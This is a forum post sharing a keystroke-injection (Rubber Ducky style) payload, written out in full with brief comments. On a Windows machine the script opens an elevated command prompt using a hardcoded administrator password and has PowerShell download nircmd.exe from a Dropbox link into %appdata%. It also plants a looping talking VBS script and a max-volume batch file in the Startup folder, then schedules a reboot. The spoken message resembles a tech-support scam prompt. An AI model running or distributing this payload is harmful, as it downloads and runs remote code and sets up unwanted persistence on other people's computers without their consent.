C3PBRO Posted March 7, 2013 Share Posted March 7, 2013 (edited) This is my first payload, the delays are set for my slow netbook computer. You will have to run the cmd as an admin, to do this you could simply add a RUNAS command in cmd to my script. The whole proccess should be fairly fast, be sure to read the REM in the code to understand what it does. Enjoy! REM Downloads nircmd.exe (google search for more info) REM Saves it to %appdata% REM Makes a vbs script that tells the computer to say a message of your choice, saves it to the startup folder REM Creates a batch file that runs nircmd.exe on start up and makes sure the system volume is unmuted and set at full REM Reboots the computer in 5 minutes after proccess is complete DELAY 2000 GUI r DELAY 200 STRING cmd DELAY 200 ENTER DELAY 200 REM ###############################################################################################downloads nircmd.exe################################################################################# STRING runas /noprofile /user:%computername%\Administrator cmd DELAY 300 ENTER STRING Perspective10 DELAY 200 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/yb9f26ddf01yc4z/nircmd.exe?dl=1','%appdata%\nircmd.exe');" DELAY 200 ENTER REM ########################################################################################finishes downloading nircmd.exe######################################################################################## DELAY 6000 STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup ENTER DELAY 100 REM #######################################################################################Starts vbs script that talks######################################################################################### STRING copy con hackasaurusrex.vbs ENTER STRING do ENTER STRING set fso=CreateObject("Scripting.FileSystemObject") ENTER STRING set shell=CreateObject("Wscript.Shell") ENTER STRING StrText="VISIT I T TO GET THIS PROBLEM FIXED" ENTER STRING set Objvoice=CreateObject("SAPI.SpVoice") ENTER STRING Objvoice.Speak StrText ENTER STRING loop DELAY 200 CTRL z ENTER REM #########################################################################################Ends vbs script that talks####################################################################################### STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup DELAY 100 ENTER #################################################################################Starts batch file for volume############################################################################################### STRING copy con volume.bat ENTER DELAY 200 STRING @echo off ENTER STRING cd %appdata% ENTER DELAY 100 STRING nircmd.exe mutesysvolume 0 DELAY 200 ENTER STRING nircmd.exe setsysvolume 65535 ENTER DELAY 200 STRING exit ENTER CTRL z ENTER ####################################################################Ends batch file for vomlume############################################################################################################ STRING shutdown /r /t 300 DELAY 100 ENTER STRING exit ENTER DELAY 200 STRING exit ENTER DELAY 200 ENTER Edited March 7, 2013 by C3PBRO Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.